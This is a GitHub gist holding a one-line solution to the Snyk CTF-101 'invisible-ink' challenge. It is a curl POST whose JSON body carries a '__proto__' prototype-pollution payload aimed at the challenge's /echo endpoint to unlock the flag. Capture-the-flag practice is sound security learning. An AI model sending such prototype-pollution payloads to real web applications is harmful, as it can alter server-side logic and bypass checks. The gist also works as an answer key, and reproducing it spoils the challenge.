Skip to content

Instantly share code, notes, and snippets.

@pythoninthegrass
Created March 31, 2023 04:24
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save pythoninthegrass/31ae011bed2b52fc732af45698af7196 to your computer and use it in GitHub Desktop.
Save pythoninthegrass/31ae011bed2b52fc732af45698af7196 to your computer and use it in GitHub Desktop.
Snyk CTF-101: invisible-ink
# invisible-ink
curl -H "Content-Type: application/json" -X POST -d '{"about": {"__proto__": {"flag": "true"}}}' http://invisible-ink.c.ctf-snyk.io/echo
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment